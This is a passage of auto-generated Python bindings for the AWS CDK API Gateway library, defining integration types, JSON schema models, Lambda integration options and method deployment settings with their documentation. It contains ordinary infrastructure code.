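#       status_code="500",
#       selection_pattern=".+",  # matches the Lambda error header
#       response_templates={"application/json": '{"message": "internal error"}'},
#   )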
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.IntegrationType")
class IntegrationType(enum.Enum):
AWS = "AWS"
"""For integrating the API method request with an AWS service action, including the Lambda function-invoking action.
With the Lambda
function-invoking action, this is referred to as the Lambda custom
integration. With any other AWS service action, this is known as AWS
integration.
"""
AWS_PROXY = "AWS_PROXY"
"""For integrating the API method request with the Lambda function-invoking action with the client request passed through as-is.
This integration is
also referred to as the Lambda proxy integration.
"""
HTTP = "HTTP"
"""For integrating the API method request with an HTTP endpoint, including a private HTTP endpoint within a VPC.
This integration is also referred to
as the HTTP custom integration.
"""
HTTP_PROXY = "HTTP_PROXY"
"""For integrating the API method request with an HTTP endpoint, including a private HTTP endpoint within a VPC, with the client request passed through as-is.
This is also referred to as the HTTP proxy integration.
"""
MOCK = "MOCK"
"""For integrating the API method request with API Gateway as a "loop-back" endpoint without invoking any backend."""
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.JsonSchema", jsii_struct_bases=[], name_mapping={'additional_items': 'additionalItems', 'additional_properties': 'additionalProperties', 'all_of': 'allOf', 'any_of': 'anyOf', 'contains': 'contains', 'definitions': 'definitions', 'dependencies': 'dependencies', 'description': 'description', 'enum': 'enum', 'exclusive_maximum': 'exclusiveMaximum', 'exclusive_minimum': 'exclusiveMinimum', 'format': 'format', 'id': 'id', 'items': 'items', 'maximum': 'maximum', 'max_items': 'maxItems', 'max_length': 'maxLength', 'max_properties': 'maxProperties', 'minimum': 'minimum', 'min_items': 'minItems', 'min_length': 'minLength', 'min_properties': 'minProperties', 'multiple_of': 'multipleOf', 'not_': 'not', 'one_of': 'oneOf', 'pattern': 'pattern', 'pattern_properties': 'patternProperties', 'properties': 'properties', 'property_names': 'propertyNames', 'ref': 'ref', 'required': 'required', 'schema': 'schema', 'title': 'title', 'type': 'type', 'unique_items': 'uniqueItems'})
class JsonSchema():
def __init__(self, *, additional_items: typing.Optional[typing.List["JsonSchema"]]=None, additional_properties: typing.Optional[bool]=None, all_of: typing.Optional[typing.List["JsonSchema"]]=None, any_of: typing.Optional[typing.List["JsonSchema"]]=None, contains: typing.Optional[typing.Union[typing.Optional["JsonSchema"], typing.Optional[typing.List["JsonSchema"]]]]=None, definitions: typing.Optional[typing.Mapping[str,"JsonSchema"]]=None, dependencies: typing.Optional[typing.Mapping[str,typing.Union["JsonSchema", typing.List[str]]]]=None, description: typing.Optional[str]=None, enum: typing.Optional[typing.List[typing.Any]]=None, exclusive_maximum: typing.Optional[bool]=None, exclusive_minimum: typing.Optional[bool]=None, format: typing.Optional[str]=None, id: typing.Optional[str]=None, items: typing.Optional[typing.Union[typing.Optional["JsonSchema"], typing.Optional[typing.List["JsonSchema"]]]]=None, maximum: typing.Optional[jsii.Number]=None, max_items: typing.Optional[jsii.Number]=None, max_length: typing.Optional[jsii.Number]=None, max_properties: typing.Optional[jsii.Number]=None, minimum: typing.Optional[jsii.Number]=None, min_items: typing.Optional[jsii.Number]=None, min_length: typing.Optional[jsii.Number]=None, min_properties: typing.Optional[jsii.Number]=None, multiple_of: typing.Optional[jsii.Number]=None, not_: typing.Optional["JsonSchema"]=None, one_of: typing.Optional[typing.List["JsonSchema"]]=None, pattern: typing.Optional[str]=None, pattern_properties: typing.Optional[typing.Mapping[str,"JsonSchema"]]=None, properties: typing.Optional[typing.Mapping[str,"JsonSchema"]]=None, property_names: typing.Optional["JsonSchema"]=None, ref: typing.Optional[str]=None, required: typing.Optional[typing.List[str]]=None, schema: typing.Optional["JsonSchemaVersion"]=None, title: typing.Optional[str]=None, type: typing.Optional[typing.Union[typing.Optional["JsonSchemaType"], typing.Optional[typing.List["JsonSchemaType"]]]]=None, unique_items: typing.Optional[bool]=None):
"""Represents a JSON schema definition of the structure of a REST API model.
Copied from npm module jsonschema.
:param additional_items:
:param additional_properties:
:param all_of:
:param any_of:
:param contains:
:param definitions:
:param dependencies:
:param description:
:param enum:
:param exclusive_maximum:
:param exclusive_minimum:
:param format:
:param id:
:param items:
:param maximum:
:param max_items:
:param max_length:
:param max_properties:
:param minimum:
:param min_items:
:param min_length:
:param min_properties:
:param multiple_of:
:param not_:
:param one_of:
:param pattern:
:param pattern_properties:
:param properties:
:param property_names:
:param ref:
:param required:
:param schema:
:param title:
:param type:
:param unique_items:
see
:see: https://github.com/tdegrunt/jsonschema
"""
if isinstance(not_, dict): not_ = JsonSchema(**not_)
if isinstance(property_names, dict): property_names = JsonSchema(**property_names)
self._values = {
}
if additional_items is not None: self._values["additional_items"] = additional_items
if additional_properties is not None: self._values["additional_properties"] = additional_properties
if all_of is not None: self._values["all_of"] = all_of
if any_of is not None: self._values["any_of"] = any_of
if contains is not None: self._values["contains"] = contains
if definitions is not None: self._values["definitions"] = definitions
if dependencies is not None: self._values["dependencies"] = dependencies
if description is not None: self._values["description"] = description
if enum is not None: self._values["enum"] = enum
if exclusive_maximum is not None: self._values["exclusive_maximum"] = exclusive_maximum
if exclusive_minimum is not None: self._values["exclusive_minimum"] = exclusive_minimum
if format is not None: self._values["format"] = format
if id is not None: self._values["id"] = id
if items is not None: self._values["items"] = items
if maximum is not None: self._values["maximum"] = maximum
if max_items is not None: self._values["max_items"] = max_items
if max_length is not None: self._values["max_length"] = max_length
if max_properties is not None: self._values["max_properties"] = max_properties
if minimum is not None: self._values["minimum"] = minimum
if min_items is not None: self._values["min_items"] = min_items
if min_length is not None: self._values["min_length"] = min_length
if min_properties is not None: self._values["min_properties"] = min_properties
if multiple_of is not None: self._values["multiple_of"] = multiple_of
if not_ is not None: self._values["not_"] = not_
if one_of is not None: self._values["one_of"] = one_of
if pattern is not None: self._values["pattern"] = pattern
if pattern_properties is not None: self._values["pattern_properties"] = pattern_properties
if properties is not None: self._values["properties"] = properties
if property_names is not None: self._values["property_names"] = property_names
if ref is not None: self._values["ref"] = ref
if required is not None: self._values["required"] = required
if schema is not None: self._values["schema"] = schema
if title is not None: self._values["title"] = title
if type is not None: self._values["type"] = type
if unique_items is not None: self._values["unique_items"] = unique_items
@property
def additional_items(self) -> typing.Optional[typing.List["JsonSchema"]]:
return self._values.get('additional_items')
@property
def additional_properties(self) -> typing.Optional[bool]:
return self._values.get('additional_properties')
@property
def all_of(self) -> typing.Optional[typing.List["JsonSchema"]]:
return self._values.get('all_of')
@property
def any_of(self) -> typing.Optional[typing.List["JsonSchema"]]:
return self._values.get('any_of')
@property
def contains(self) -> typing.Optional[typing.Union[typing.Optional["JsonSchema"], typing.Optional[typing.List["JsonSchema"]]]]:
return self._values.get('contains')
@property
def definitions(self) -> typing.Optional[typing.Mapping[str,"JsonSchema"]]:
return self._values.get('definitions')
@property
def dependencies(self) -> typing.Optional[typing.Mapping[str,typing.Union["JsonSchema", typing.List[str]]]]:
return self._values.get('dependencies')
@property
def description(self) -> typing.Optional[str]:
return self._values.get('description')
@property
def enum(self) -> typing.Optional[typing.List[typing.Any]]:
return self._values.get('enum')
@property
def exclusive_maximum(self) -> typing.Optional[bool]:
return self._values.get('exclusive_maximum')
@property
def exclusive_minimum(self) -> typing.Optional[bool]:
return self._values.get('exclusive_minimum')
@property
def format(self) -> typing.Optional[str]:
return self._values.get('format')
@property
def id(self) -> typing.Optional[str]:
return self._values.get('id')
@property
def items(self) -> typing.Optional[typing.Union[typing.Optional["JsonSchema"], typing.Optional[typing.List["JsonSchema"]]]]:
return self._values.get('items')
@property
def maximum(self) -> typing.Optional[jsii.Number]:
return self._values.get('maximum')
@property
def max_items(self) -> typing.Optional[jsii.Number]:
return self._values.get('max_items')
@property
def max_length(self) -> typing.Optional[jsii.Number]:
return self._values.get('max_length')
@property
def max_properties(self) -> typing.Optional[jsii.Number]:
return self._values.get('max_properties')
@property
def minimum(self) -> typing.Optional[jsii.Number]:
return self._values.get('minimum')
@property
def min_items(self) -> typing.Optional[jsii.Number]:
return self._values.get('min_items')
@property
def min_length(self) -> typing.Optional[jsii.Number]:
return self._values.get('min_length')
@property
def min_properties(self) -> typing.Optional[jsii.Number]:
return self._values.get('min_properties')
@property
def multiple_of(self) -> typing.Optional[jsii.Number]:
return self._values.get('multiple_of')
@property
def not_(self) -> typing.Optional["JsonSchema"]:
return self._values.get('not_')
@property
def one_of(self) -> typing.Optional[typing.List["JsonSchema"]]:
return self._values.get('one_of')
@property
def pattern(self) -> typing.Optional[str]:
return self._values.get('pattern')
@property
def pattern_properties(self) -> typing.Optional[typing.Mapping[str,"JsonSchema"]]:
return self._values.get('pattern_properties')
@property
def properties(self) -> typing.Optional[typing.Mapping[str,"JsonSchema"]]:
return self._values.get('properties')
@property
def property_names(self) -> typing.Optional["JsonSchema"]:
return self._values.get('property_names')
@property
def ref(self) -> typing.Optional[str]:
return self._values.get('ref')
@property
def required(self) -> typing.Optional[typing.List[str]]:
return self._values.get('required')
@property
def schema(self) -> typing.Optional["JsonSchemaVersion"]:
return self._values.get('schema')
@property
def title(self) -> typing.Optional[str]:
return self._values.get('title')
@property
def type(self) -> typing.Optional[typing.Union[typing.Optional["JsonSchemaType"], typing.Optional[typing.List["JsonSchemaType"]]]]:
return self._values.get('type')
@property
def unique_items(self) -> typing.Optional[bool]:
return self._values.get('unique_items')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'JsonSchema(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
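# Construction sketch (illustrative): a draft-4 schema for a simple model.
#
#   book_schema = JsonSchema(
#       schema=JsonSchemaVersion.DRAFT4,
#       title="Book",
#       type=JsonSchemaType.OBJECT,
#       properties={
#           "title": JsonSchema(type=JsonSchemaType.STRING),
#           "pages": JsonSchema(type=JsonSchemaType.INTEGER),
#       },
#       required=["title"],
#   )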
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.JsonSchemaType")
class JsonSchemaType(enum.Enum):
NULL = "NULL"
BOOLEAN = "BOOLEAN"
OBJECT = "OBJECT"
ARRAY = "ARRAY"
NUMBER = "NUMBER"
INTEGER = "INTEGER"
STRING = "STRING"
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.JsonSchemaVersion")
class JsonSchemaVersion(enum.Enum):
DRAFT4 = "DRAFT4"
"""In API Gateway models are defined using the JSON schema draft 4.
see
:see: https://tools.ietf.org/html/draft-zyp-json-schema-04
"""
DRAFT7 = "DRAFT7"
class LambdaIntegration(AwsIntegration, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.LambdaIntegration"):
"""Integrates an AWS Lambda function to an API Gateway method.
Example::
# Example automatically generated. See https://github.com/aws/jsii/issues/826
handler = aws_lambda.Function(self, "MyFunction", ...)
api.root.add_method("GET", LambdaIntegration(handler))
"""
def __init__(self, handler: aws_cdk.aws_lambda.IFunction, *, allow_test_invoke: typing.Optional[bool]=None, proxy: typing.Optional[bool]=None, cache_key_parameters: typing.Optional[typing.List[str]]=None, cache_namespace: typing.Optional[str]=None, connection_type: typing.Optional["ConnectionType"]=None, content_handling: typing.Optional["ContentHandling"]=None, credentials_passthrough: typing.Optional[bool]=None, credentials_role: typing.Optional[aws_cdk.aws_iam.IRole]=None, integration_responses: typing.Optional[typing.List["IntegrationResponse"]]=None, passthrough_behavior: typing.Optional["PassthroughBehavior"]=None, request_parameters: typing.Optional[typing.Mapping[str,str]]=None, request_templates: typing.Optional[typing.Mapping[str,str]]=None, vpc_link: typing.Optional["VpcLink"]=None) -> None:
"""
:param handler: -
:param options: -
:param allow_test_invoke: Allow invoking method from AWS Console UI (for testing purposes). This will add another permission to the AWS Lambda resource policy which will allow the ``test-invoke-stage`` stage to invoke this handler. If this is set to ``false``, the function will only be usable from the deployment endpoint. Default: true
:param proxy: Use proxy integration or normal (request/response mapping) integration. Default: true
:param cache_key_parameters: A list of request parameters whose values are to be cached. It determines request parameters that will make it into the cache key.
:param cache_namespace: An API-specific tag group of related cached parameters.
:param connection_type: The type of network connection to the integration endpoint. Default: ConnectionType.Internet
:param content_handling: Specifies how to handle request payload content type conversions. Default: none; if this property isn't defined, the request payload is passed through from the method request to the integration request without modification, provided that the ``passthroughBehavior`` property is configured to support payload pass-through.
:param credentials_passthrough: Requires that the caller's identity be passed through from the request. Default: Caller identity is not passed through
:param credentials_role: An IAM role that API Gateway assumes. Mutually exclusive with ``credentialsPassthrough``. Default: A role is not assumed
:param integration_responses: The response that API Gateway provides after a method's backend completes processing a request. API Gateway intercepts the response from the backend so that you can control how API Gateway surfaces backend responses. For example, you can map the backend status codes to codes that you define.
:param passthrough_behavior: Specifies the pass-through behavior for incoming requests based on the Content-Type header in the request, and the available mapping templates specified as the requestTemplates property on the Integration resource. There are three valid values: WHEN_NO_MATCH, WHEN_NO_TEMPLATES, and NEVER.
:param request_parameters: The request parameters that API Gateway sends with the backend request. Specify request parameters as key-value pairs (string-to-string mappings), with a destination as the key and a source as the value. Specify the destination by using the following pattern integration.request.location.name, where location is querystring, path, or header, and name is a valid, unique parameter name. The source must be an existing method request parameter or a static value. You must enclose static values in single quotation marks and pre-encode these values based on their destination in the request.
:param request_templates: A map of Apache Velocity templates that are applied on the request payload. The template that API Gateway uses is based on the value of the Content-Type header that's sent by the client. The content type value is the key, and the template is the value (specified as a string), such as the following snippet: { "application/json": "{\n "statusCode": "200"\n}" }
:param vpc_link: The VpcLink used for the integration. Required if connectionType is VPC_LINK.
"""
options = LambdaIntegrationOptions(allow_test_invoke=allow_test_invoke, proxy=proxy, cache_key_parameters=cache_key_parameters, cache_namespace=cache_namespace, connection_type=connection_type, content_handling=content_handling, credentials_passthrough=credentials_passthrough, credentials_role=credentials_role, integration_responses=integration_responses, passthrough_behavior=passthrough_behavior, request_parameters=request_parameters, request_templates=request_templates, vpc_link=vpc_link)
jsii.create(LambdaIntegration, self, [handler, options])
@jsii.member(jsii_name="bind")
def bind(self, method: "Method") -> None:
"""Can be overridden by subclasses to allow the integration to interact with the method being integrated, access the REST API object, method ARNs, etc.
:param method: -
"""
return jsii.invoke(self, "bind", [method])
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.LambdaIntegrationOptions", jsii_struct_bases=[IntegrationOptions], name_mapping={'cache_key_parameters': 'cacheKeyParameters', 'cache_namespace': 'cacheNamespace', 'connection_type': 'connectionType', 'content_handling': 'contentHandling', 'credentials_passthrough': 'credentialsPassthrough', 'credentials_role': 'credentialsRole', 'integration_responses': 'integrationResponses', 'passthrough_behavior': 'passthroughBehavior', 'request_parameters': 'requestParameters', 'request_templates': 'requestTemplates', 'vpc_link': 'vpcLink', 'allow_test_invoke': 'allowTestInvoke', 'proxy': 'proxy'})
class LambdaIntegrationOptions(IntegrationOptions):
def __init__(self, *, cache_key_parameters: typing.Optional[typing.List[str]]=None, cache_namespace: typing.Optional[str]=None, connection_type: typing.Optional["ConnectionType"]=None, content_handling: typing.Optional["ContentHandling"]=None, credentials_passthrough: typing.Optional[bool]=None, credentials_role: typing.Optional[aws_cdk.aws_iam.IRole]=None, integration_responses: typing.Optional[typing.List["IntegrationResponse"]]=None, passthrough_behavior: typing.Optional["PassthroughBehavior"]=None, request_parameters: typing.Optional[typing.Mapping[str,str]]=None, request_templates: typing.Optional[typing.Mapping[str,str]]=None, vpc_link: typing.Optional["VpcLink"]=None, allow_test_invoke: typing.Optional[bool]=None, proxy: typing.Optional[bool]=None):
"""
:param cache_key_parameters: A list of request parameters whose values are to be cached. It determines request parameters that will make it into the cache key.
:param cache_namespace: An API-specific tag group of related cached parameters.
:param connection_type: The type of network connection to the integration endpoint. Default: ConnectionType.Internet
:param content_handling: Specifies how to handle request payload content type conversions. Default: none; if this property isn't defined, the request payload is passed through from the method request to the integration request without modification, provided that the ``passthroughBehavior`` property is configured to support payload pass-through.
:param credentials_passthrough: Requires that the caller's identity be passed through from the request. Default: Caller identity is not passed through
:param credentials_role: An IAM role that API Gateway assumes. Mutually exclusive with ``credentialsPassthrough``. Default: A role is not assumed
:param integration_responses: The response that API Gateway provides after a method's backend completes processing a request. API Gateway intercepts the response from the backend so that you can control how API Gateway surfaces backend responses. For example, you can map the backend status codes to codes that you define.
:param passthrough_behavior: Specifies the pass-through behavior for incoming requests based on the Content-Type header in the request, and the available mapping templates specified as the requestTemplates property on the Integration resource. There are three valid values: WHEN_NO_MATCH, WHEN_NO_TEMPLATES, and NEVER.
:param request_parameters: The request parameters that API Gateway sends with the backend request. Specify request parameters as key-value pairs (string-to-string mappings), with a destination as the key and a source as the value. Specify the destination by using the following pattern integration.request.location.name, where location is querystring, path, or header, and name is a valid, unique parameter name. The source must be an existing method request parameter or a static value. You must enclose static values in single quotation marks and pre-encode these values based on their destination in the request.
:param request_templates: A map of Apache Velocity templates that are applied on the request payload. The template that API Gateway uses is based on the value of the Content-Type header that's sent by the client. The content type value is the key, and the template is the value (specified as a string), such as the following snippet: { "application/json": "{\n "statusCode": "200"\n}" }
:param vpc_link: The VpcLink used for the integration. Required if connectionType is VPC_LINK.
:param allow_test_invoke: Allow invoking method from AWS Console UI (for testing purposes). This will add another permission to the AWS Lambda resource policy which will allow the ``test-invoke-stage`` stage to invoke this handler. If this is set to ``false``, the function will only be usable from the deployment endpoint. Default: true
:param proxy: Use proxy integration or normal (request/response mapping) integration. Default: true
"""
self._values = {
}
if cache_key_parameters is not None: self._values["cache_key_parameters"] = cache_key_parameters
if cache_namespace is not None: self._values["cache_namespace"] = cache_namespace
if connection_type is not None: self._values["connection_type"] = connection_type
if content_handling is not None: self._values["content_handling"] = content_handling
if credentials_passthrough is not None: self._values["credentials_passthrough"] = credentials_passthrough
if credentials_role is not None: self._values["credentials_role"] = credentials_role
if integration_responses is not None: self._values["integration_responses"] = integration_responses
if passthrough_behavior is not None: self._values["passthrough_behavior"] = passthrough_behavior
if request_parameters is not None: self._values["request_parameters"] = request_parameters
if request_templates is not None: self._values["request_templates"] = request_templates
if vpc_link is not None: self._values["vpc_link"] = vpc_link
if allow_test_invoke is not None: self._values["allow_test_invoke"] = allow_test_invoke
if proxy is not None: self._values["proxy"] = proxy
@property
def cache_key_parameters(self) -> typing.Optional[typing.List[str]]:
"""A list of request parameters whose values are to be cached.
It determines
request parameters that will make it into the cache key.
"""
return self._values.get('cache_key_parameters')
@property
def cache_namespace(self) -> typing.Optional[str]:
"""An API-specific tag group of related cached parameters."""
return self._values.get('cache_namespace')
@property
def connection_type(self) -> typing.Optional["ConnectionType"]:
"""The type of network connection to the integration endpoint.
default
:default: ConnectionType.Internet
"""
return self._values.get('connection_type')
@property
def content_handling(self) -> typing.Optional["ContentHandling"]:
"""Specifies how to handle request payload content type conversions.
default
:default:
none; if this property isn't defined, the request payload is passed
through from the method request to the integration request without
modification, provided that the ``passthroughBehavior`` property is
configured to support payload pass-through.
"""
return self._values.get('content_handling')
@property
def credentials_passthrough(self) -> typing.Optional[bool]:
"""Requires that the caller's identity be passed through from the request.
default
:default: Caller identity is not passed through
"""
return self._values.get('credentials_passthrough')
@property
def credentials_role(self) -> typing.Optional[aws_cdk.aws_iam.IRole]:
"""An IAM role that API Gateway assumes.
Mutually exclusive with ``credentialsPassthrough``.
default
:default: A role is not assumed
"""
return self._values.get('credentials_role')
@property
def integration_responses(self) -> typing.Optional[typing.List["IntegrationResponse"]]:
"""The response that API Gateway provides after a method's backend completes processing a request.
API Gateway intercepts the response from the
backend so that you can control how API Gateway surfaces backend
responses. For example, you can map the backend status codes to codes
that you define.
"""
return self._values.get('integration_responses')
@property
def passthrough_behavior(self) -> typing.Optional["PassthroughBehavior"]:
"""Specifies the pass-through behavior for incoming requests based on the Content-Type header in the request, and the available mapping templates specified as the requestTemplates property on the Integration resource. There are three valid values: WHEN_NO_MATCH, WHEN_NO_TEMPLATES, and NEVER."""
return self._values.get('passthrough_behavior')
@property
def request_parameters(self) -> typing.Optional[typing.Mapping[str,str]]:
"""The request parameters that API Gateway sends with the backend request. Specify request parameters as key-value pairs (string-to-string mappings), with a destination as the key and a source as the value.
Specify the destination by using the following pattern
integration.request.location.name, where location is querystring, path,
or header, and name is a valid, unique parameter name.
The source must be an existing method request parameter or a static
value. You must enclose static values in single quotation marks and
pre-encode these values based on their destination in the request.
"""
return self._values.get('request_parameters')
@property
def request_templates(self) -> typing.Optional[typing.Mapping[str,str]]:
"""A map of Apache Velocity templates that are applied on the request payload.
The template that API Gateway uses is based on the value of the
Content-Type header that's sent by the client. The content type value is
the key, and the template is the value (specified as a string), such as
the following snippet:
{ "application/json": "{\n "statusCode": "200"\n}" }
see
:see: http://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-mapping-template-reference.html
"""
return self._values.get('request_templates')
@property
def vpc_link(self) -> typing.Optional["VpcLink"]:
"""The VpcLink used for the integration. Required if connectionType is VPC_LINK."""
return self._values.get('vpc_link')
@property
def allow_test_invoke(self) -> typing.Optional[bool]:
"""Allow invoking method from AWS Console UI (for testing purposes).
This will add another permission to the AWS Lambda resource policy which
will allow the ``test-invoke-stage`` stage to invoke this handler. If this
is set to ``false``, the function will only be usable from the deployment
endpoint.
default
:default: true
"""
return self._values.get('allow_test_invoke')
@property
def proxy(self) -> typing.Optional[bool]:
"""Use proxy integration or normal (request/response mapping) integration.
default
:default: true
"""
return self._values.get('proxy')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'LambdaIntegrationOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
class Method(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.Method"):
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, http_method: str, resource: "IResource", integration: typing.Optional["Integration"]=None, options: typing.Optional["MethodOptions"]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param http_method: The HTTP method ("GET", "POST", "PUT", ...) that clients use to call this method.
:param resource: The resource this method is associated with. For root resource methods, specify the ``RestApi`` object.
:param integration: The backend system that the method calls when it receives a request. Default: - a new ``MockIntegration``.
:param options: Method options. Default: - No options.
"""
props = MethodProps(http_method=http_method, resource=resource, integration=integration, options=options)
jsii.create(Method, self, [scope, id, props])
@property
@jsii.member(jsii_name="httpMethod")
def http_method(self) -> str:
return jsii.get(self, "httpMethod")
@property
@jsii.member(jsii_name="methodArn")
def method_arn(self) -> str:
"""Returns an execute-api ARN for this method:.
arn:aws:execute-api:{region}:{account}:{restApiId}/{stage}/{method}/{path}
NOTE: {stage} will refer to the ``restApi.deploymentStage``, which will be
set automatically if auto-deploy is enabled.
attribute:
:attribute:: true
"""
return jsii.get(self, "methodArn")
@property
@jsii.member(jsii_name="methodId")
def method_id(self) -> str:
"""
attribute:
:attribute:: true
"""
return jsii.get(self, "methodId")
@property
@jsii.member(jsii_name="resource")
def resource(self) -> "IResource":
return jsii.get(self, "resource")
@property
@jsii.member(jsii_name="restApi")
def rest_api(self) -> "RestApi":
return jsii.get(self, "restApi")
@property
@jsii.member(jsii_name="testMethodArn")
def test_method_arn(self) -> str:
"""Returns an execute-api ARN for this method's "test-invoke-stage" stage. This stage is used by the AWS Console UI when testing the method."""
return jsii.get(self, "testMethodArn")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.MethodDeploymentOptions", jsii_struct_bases=[], name_mapping={'cache_data_encrypted': 'cacheDataEncrypted', 'cache_ttl': 'cacheTtl', 'caching_enabled': 'cachingEnabled', 'data_trace_enabled': 'dataTraceEnabled', 'logging_level': 'loggingLevel', 'metrics_enabled': 'metricsEnabled', 'throttling_burst_limit': 'throttlingBurstLimit', 'throttling_rate_limit': 'throttlingRateLimit'})
class MethodDeploymentOptions():
def __init__(self, *, cache_data_encrypted: typing.Optional[bool]=None, cache_ttl: typing.Optional[aws_cdk.core.Duration]=None, caching_enabled: typing.Optional[bool]=None, data_trace_enabled: typing.Optional[bool]=None, logging_level: typing.Optional["MethodLoggingLevel"]=None, metrics_enabled: typing.Optional[bool]=None, throttling_burst_limit: typing.Optional[jsii.Number]=None, throttling_rate_limit: typing.Optional[jsii.Number]=None):
"""
:param cache_data_encrypted: Indicates whether the cached responses are encrypted. Default: false
:param cache_ttl: Specifies the time to live (TTL), in seconds, for cached responses. The higher the TTL, the longer the response will be cached. Default: Duration.minutes(5)
:param caching_enabled: Specifies whether responses should be cached and returned for requests. A cache cluster must be enabled on the stage for responses to be cached. Default: - Caching is Disabled.
:param data_trace_enabled: Specifies whether data trace logging is enabled for this method, which affects the log entries pushed to Amazon CloudWatch Logs. Default: false
:param logging_level: Specifies the logging level for this method, which affects the log entries pushed to Amazon CloudWatch Logs. Default: - Off
:param metrics_enabled: Specifies whether Amazon CloudWatch metrics are enabled for this method. Default: false
:param throttling_burst_limit: Specifies the throttling burst limit. The total rate of all requests in your AWS account is limited to 5,000 requests. Default: - No additional restriction.
:param throttling_rate_limit: Specifies the throttling rate limit. The total rate of all requests in your AWS account is limited to 10,000 requests per second (rps). Default: - No additional restriction.
"""
self._values = {
}
if cache_data_encrypted is not None: self._values["cache_data_encrypted"] = cache_data_encrypted
if cache_ttl is not None: self._values["cache_ttl"] = cache_ttl
if caching_enabled is not None: self._values["caching_enabled"] = caching_enabled
if data_trace_enabled is not None: self._values["data_trace_enabled"] = data_trace_enabled
if logging_level is not None: self._values["logging_level"] = logging_level
if metrics_enabled is not None: self._values["metrics_enabled"] = metrics_enabled
if throttling_burst_limit is not None: self._values["throttling_burst_limit"] = throttling_burst_limit
if throttling_rate_limit is not None: self._values["throttling_rate_limit"] = throttling_rate_limit
@property
def cache_data_encrypted(self) -> typing.Optional[bool]:
"""Indicates whether the cached responses are encrypted.
default
:default: false
"""
return self._values.get('cache_data_encrypted')
@property
def cache_ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
"""Specifies the time to live (TTL), in seconds, for cached responses.
The
higher the TTL, the longer the response will be cached.
default
:default: Duration.minutes(5)
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-caching.html
"""
return self._values.get('cache_ttl')
@property
def caching_enabled(self) -> typing.Optional[bool]:
"""Specifies whether responses should be cached and returned for requests.
A
cache cluster must be enabled on the stage for responses to be cached.
default
:default: - Caching is Disabled.
"""
return self._values.get('caching_enabled')
@property
def data_trace_enabled(self) -> typing.Optional[bool]:
"""Specifies whether data trace logging is enabled for this method, which effects the log entries pushed to Amazon CloudWatch Logs.
default
:default: false
"""
return self._values.get('data_trace_enabled')
@property
def logging_level(self) -> typing.Optional["MethodLoggingLevel"]:
"""Specifies the logging level for this method, which effects the log entries pushed to Amazon CloudWatch Logs.
default
:default: - Off
"""
return self._values.get('logging_level')
@property
def metrics_enabled(self) -> typing.Optional[bool]:
"""Specifies whether Amazon CloudWatch metrics are enabled for this method.
default
:default: false
"""
return self._values.get('metrics_enabled')
@property
def throttling_burst_limit(self) -> typing.Optional[jsii.Number]:
"""Specifies the throttling burst limit. The total rate of all requests in your AWS account is limited to 5,000 requests.
default
:default: - No additional restriction.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-request-throttling.html
"""
return self._values.get('throttling_burst_limit')
@property
def throttling_rate_limit(self) -> typing.Optional[jsii.Number]:
"""Specifies the throttling rate limit. The total rate of all requests in your AWS account is limited to 10,000 requests per second (rps).
default
:default: - No additional restriction.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-request-throttling.html
"""
return self._values.get('throttling_rate_limit')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'MethodDeploymentOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
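# Usage sketch (illustrative only; assumes ``core`` is ``aws_cdk.core``).
# Per-method deployment overrides are typically supplied through
# ``StageOptions.method_options``, keyed by "{resource-path}/{http-method}"
# ("/*/*" applies to all methods):
#
#   deploy_options = StageOptions(method_options={
#       "/*/*": MethodDeploymentOptions(
#           caching_enabled=True,
#           cache_ttl=core.Duration.minutes(10),
#           throttling_rate_limit=100,
#           throttling_burst_limit=200)})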
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.MethodLoggingLevel")
class MethodLoggingLevel(enum.Enum):
OFF = "OFF"
ERROR = "ERROR"
INFO = "INFO"
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.MethodOptions", jsii_struct_bases=[], name_mapping={'api_key_required': 'apiKeyRequired', 'authorization_type': 'authorizationType', 'authorizer': 'authorizer', 'method_responses': 'methodResponses', 'operation_name': 'operationName', 'request_models': 'requestModels', 'request_parameters': 'requestParameters', 'request_validator': 'requestValidator'})
class MethodOptions():
def __init__(self, *, api_key_required: typing.Optional[bool]=None, authorization_type: typing.Optional["AuthorizationType"]=None, authorizer: typing.Optional["IAuthorizer"]=None, method_responses: typing.Optional[typing.List["MethodResponse"]]=None, operation_name: typing.Optional[str]=None, request_models: typing.Optional[typing.Mapping[str,"IModel"]]=None, request_parameters: typing.Optional[typing.Mapping[str,bool]]=None, request_validator: typing.Optional["IRequestValidator"]=None):
"""
:param api_key_required: Indicates whether the method requires clients to submit a valid API key. Default: false
:param authorization_type: Method authorization. Default: None (open access)
:param authorizer: If ``authorizationType`` is ``Custom``, this specifies the ID of the method authorizer resource.
:param method_responses: The responses that can be sent to the client who calls the method. Default: None This property is not required, but if these are not supplied for a Lambda proxy integration, the Lambda function must return a value of the correct format, for the integration response to be correctly mapped to a response to the client.
:param operation_name: A friendly operation name for the method. For example, you can assign the OperationName of ListPets for the GET /pets method.
